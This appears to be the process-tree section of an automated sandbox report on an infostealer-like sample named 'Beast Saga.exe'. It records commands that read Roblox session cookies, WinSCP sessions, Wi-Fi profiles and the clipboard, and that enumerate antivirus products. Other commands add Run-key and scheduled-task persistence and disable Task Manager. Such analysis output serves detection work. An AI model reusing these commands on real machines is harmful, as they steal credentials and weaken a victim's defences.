- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:1552
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:4160
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:2072
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:1164
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:936
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:2860
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:2304
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:5004
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=NaN get ExecutablePath"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2396
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4964
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=NaN get ExecutablePath"
    3⤵
    PID:9316
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic process where processid=NaN get ExecutablePath
      4⤵
      PID:7268
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -NoProfile -Command "& { $Action = New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Failed' $Trigger = New-ScheduledTaskTrigger -Daily -At '12:00PM' Register-ScheduledTask -Action $Action -Trigger $Trigger -TaskName StartCacaTask }"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:6808
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall""
    3⤵
    PID:11488
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"
      4⤵
      PID:11408
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip""
    3⤵
    PID:11576
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip"
      4⤵
      PID:11588
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore""
    3⤵
    PID:3020
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore"
      4⤵
      PID:10648
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX""
    3⤵
    PID:11152
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX"
      4⤵
      PID:12016
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack""
    3⤵
    PID:9400
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack"
      4⤵
      PID:6236
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3544B2EE-E62F-4D11-B79C-3DDEACE94DA5}""
    3⤵
    PID:2236
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3544B2EE-E62F-4D11-B79C-3DDEACE94DA5}"
      4⤵
      PID:8512
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D44822A8-FC28-42FC-8B1D-21A78579FC79}""
    3⤵
    PID:10520
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:2860
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D44822A8-FC28-42FC-8B1D-21A78579FC79}"
      4⤵
      PID:6256
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:8144
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:8644
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:6820
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:8672
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Roaming\saluttsUBG.ps1" -RunAsAdministrator"
    3⤵
    PID:12116
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_XkIyAG.vbs\"""
    3⤵
    PID:5564
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Start_XkIyAG /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_XkIyAG.vbs /f"
    3⤵
    PID:11360
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f"
    3⤵
    PID:11632
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions""
    3⤵
    PID:6608
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -NoProfile -Command "& {netsh wlan show profile}"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:6980
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -NoProfile -Command "& {powershell Get-Clipboard}"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:2528
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -NoProfile -Command "& { function Get-AntiVirusProduct { [CmdletBinding()] param ( [parameter(ValueFromPipeline=$true, ValueFromPipelineByPropertyName=$true)] [Alias('name')] $computername=$env:computername ) $AntiVirusProducts = Get-WmiObject -Namespace \"root\SecurityCenter2\" -Class AntiVirusProduct -ComputerName $computername $ret = @() foreach ($AntiVirusProduct in $AntiVirusProducts) { switch ($AntiVirusProduct.productState) { \"262144\" { $defstatus = \"Up to date\"; $rtstatus = \"Disabled\" } \"262160\" { $defstatus = \"Out of date\"; $rtstatus = \"Disabled\" } \"266240\" { $defstatus = \"Up to date\"; $rtstatus = \"Enabled\" } \"266256\" { $defstatus = \"Out of date\"; $rtstatus = \"Enabled\" } \"393216\" { $defstatus = \"Up to date\"; $rtstatus = \"Disabled\" } \"393232\" { $defstatus = \"Out of date\"; $rtstatus = \"Disabled\" } \"393488\" { $defstatus = \"Out of date\"; $rtstatus = \"Disabled\" } \"397312\" { $defstatus = \"Up to date\"; $rtstatus = \"Enabled\" } \"397328\" { $defstatus = \"Out of date\"; $rtstatus = \"Enabled\" } \"397584\" { $defstatus = \"Out of date\"; $rtstatus = \"Enabled\" } default { $defstatus = \"Unknown\"; $rtstatus = \"Unknown\" } } $ht = @{} $ht.Computername = $computername $ht.Name = $AntiVirusProduct.displayName $ht.'Product GUID' = $AntiVirusProduct.instanceGuid $ht.'Product Executable' = $AntiVirusProduct.pathToSignedProductExe $ht.'Reporting Exe' = $AntiVirusProduct.pathToSignedReportingExe $ht.'Definition Status' = $defstatus $ht.'Real-time Protection Status' = $rtstatus # Créez un nouvel objet pour chaque ordinateur $ret += New-Object -TypeName PSObject -Property $ht } Return $ret } Get-AntiVirusProduct }"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:7780
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "cscript C:\Users\Admin\AppData\Roaming\dTIH8ADMxfxv.vbs"
    3⤵
    PID:7828
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\dQO6oCgQvhNT_temp.ps1""
    3⤵
    PID:6092
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{E016F2B9-01FE-4FAA-882E-ECC43FA49751}""
    3⤵
    PID:12240
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}""
    3⤵
    PID:12232
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}""
    3⤵
    PID:5396
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{C7141A99-592B-4226-A4E9-B767C1D0FBAF}""
    3⤵
    PID:5652
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AE86D888-1404-47CC-A7BB-8D86C0503E58}""
    3⤵
    PID:6380
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0409-1000-0000000FF1CE}""
    3⤵
    PID:352
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-1000-0000000FF1CE}""
    3⤵
    PID:7920
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-007E-0000-1000-0000000FF1CE}""
    3⤵
    PID:3148
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{77924AE4-039E-4CA4-87B4-2F64180381F0}""
    3⤵
    PID:3200
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{76DEEAB3-122F-4231-83C7-0C35363D02F9}""
    3⤵
    PID:8360
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6DB765A8-05AF-49A1-A71D-6F645EE3CE41}""
    3⤵
    PID:8832
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{662A0088-6FCD-45DD-9EA7-68674058AED5}""
    3⤵
    PID:8836
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180381}""
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4268
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}""
    3⤵
    PID:9016
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}""
    3⤵
    PID:7796
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3A706840-2882-423C-90EB-B31545E2BC7A}""
    3⤵
    PID:2252
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}""
    3⤵
    PID:6740
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}""
    3⤵
    PID:5976
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{113C0ADC-B9BD-4F95-9653-4F5BC540ED03}""
    3⤵
    PID:7808
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC""
    3⤵
    PID:4472
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VLC media player""
    3⤵
    PID:10420
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent""
    3⤵
    PID:6480
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ProPlusRetail - en-us""
    3⤵
    PID:7520
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2""
    3⤵
    PID:9908
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService""
    3⤵
    PID:6504
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 105.0.3 (x64 en-US)""
    3⤵
    PID:5840
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData""
    3⤵
    PID:3048
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data""
    3⤵
    PID:4188
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40""
    3⤵
    PID:3232
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime""
    3⤵
    PID:11724
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx""
    3⤵
    PID:11764
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager""
    3⤵
    PID:11864
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook""
    3⤵
    PID:11500
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall""
    3⤵
    PID:11628
- - C:\Users\Admin\AppData\Local\Temp\2bIrywvMmpNGWTWi4VLYnJjQOnl\Beast Saga.exe
    "C:\Users\Admin\AppData\Local\Temp\2bIrywvMmpNGWTWi4VLYnJjQOnl\Beast Saga.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="C:\Users\Admin\AppData\Roaming\script" --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAIAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3192 --field-trial-handle=1748,10882465382172539408,2542723803599405887,131072 --disable-features=PlzServiceWorker,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
    3⤵
    PID:8900

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4396

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4444

C:\Windows\System32\Wbem\WMIC.exe
wmic process where processid=NaN get ExecutablePath
1⤵
PID:4268
- C:\Windows\System32\Conhost.exe
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  2⤵
  PID:6528
- C:\Windows\system32\reg.exe
  C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180381}"
  2⤵
  PID:10184

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:7456

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:7736

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:8064

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:7116

C:\Windows\system32\tasklist.exe
tasklist
1⤵
PID:8400

C:\Windows\system32\tasklist.exe
tasklist
1⤵
PID:8564

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:8796

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:9020

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:9160

C:\Windows\system32\more.com
more +1
1⤵
PID:9320

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:9676

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 session
1⤵
PID:9640

C:\Windows\system32\tasklist.exe
tasklist
1⤵
PID:9252

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:9244

C:\Windows\system32\tasklist.exe
tasklist
1⤵
PID:9236

C:\Windows\system32\tasklist.exe
tasklist
1⤵
PID:9000

C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
1⤵
PID:8992

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:8984

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:8976

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:8924

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:8908

C:\Windows\System32\Wbem\WMIC.exe
wmic OS get caption, osarchitecture
1⤵
PID:8848

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:8840

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:8832
- C:\Windows\system32\reg.exe
  C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6DB765A8-05AF-49A1-A71D-6F645EE3CE41}"
  2⤵
  PID:9220

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:8772

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:8764

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:8756

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:8748

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:8704

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:8684

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:8640

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:8624

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:8616

C:\Windows\system32\tasklist.exe
tasklist
1⤵
PID:8608

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:8600

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:8592

C:\Windows\system32\net.exe
net session
1⤵
PID:8540

C:\Windows\system32\tasklist.exe
tasklist
1⤵
PID:8480

C:\Windows\system32\tasklist.exe
tasklist
1⤵
PID:8532

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:8452

C:\Windows\system32\tasklist.exe
tasklist
1⤵
PID:8444

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:8420

C:\Windows\system32\tasklist.exe
tasklist
1⤵
PID:8392

C:\Windows\system32\tasklist.exe
tasklist
1⤵
PID:8324

C:\Windows\system32\tasklist.exe
tasklist
1⤵
PID:8280

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:8272

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:8264

C:\Windows\system32\tasklist.exe
tasklist
1⤵
PID:8256

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:8244

C:\Windows\system32\tasklist.exe
tasklist
1⤵
PID:8228

C:\Windows\system32\tasklist.exe
tasklist
1⤵
PID:8220

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:6864

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:8148

C:\Windows\system32\tasklist.exe
tasklist
1⤵
PID:8140

C:\Windows\system32\tasklist.exe
tasklist
1⤵
PID:8132

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:8124

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:8116

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:8108

C:\Windows\system32\tasklist.exe
tasklist
1⤵
PID:8100

C:\Windows\system32\tasklist.exe
tasklist
1⤵
PID:8088

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:8076

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:8004

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:7996

C:\Windows\system32\tasklist.exe
tasklist
1⤵
PID:7988

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:7976

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:7960

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:7952

C:\Windows\system32\tasklist.exe
tasklist
1⤵
PID:7940

C:\Windows\system32\tasklist.exe
tasklist
1⤵
PID:7932

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:7924

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:7916

C:\Windows\system32\tasklist.exe
tasklist
1⤵
PID:7908

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:7892

C:\Windows\system32\tasklist.exe
tasklist
1⤵
PID:7884

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:7876

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:7860

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:7852

C:\Windows\system32\tasklist.exe
tasklist
1⤵
PID:7844

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:7820

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:7812

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:7804

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:7720

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:7712

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:7704

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:7632

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:7616

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:7608

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:7588

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:7568

C:\Windows\System32\Wbem\WMIC.exe
wmic PATH Win32_VideoController get name
1⤵
- Detects videocard installed
PID:11440

C:\Windows\system32\more.com
more +1
1⤵
PID:11448

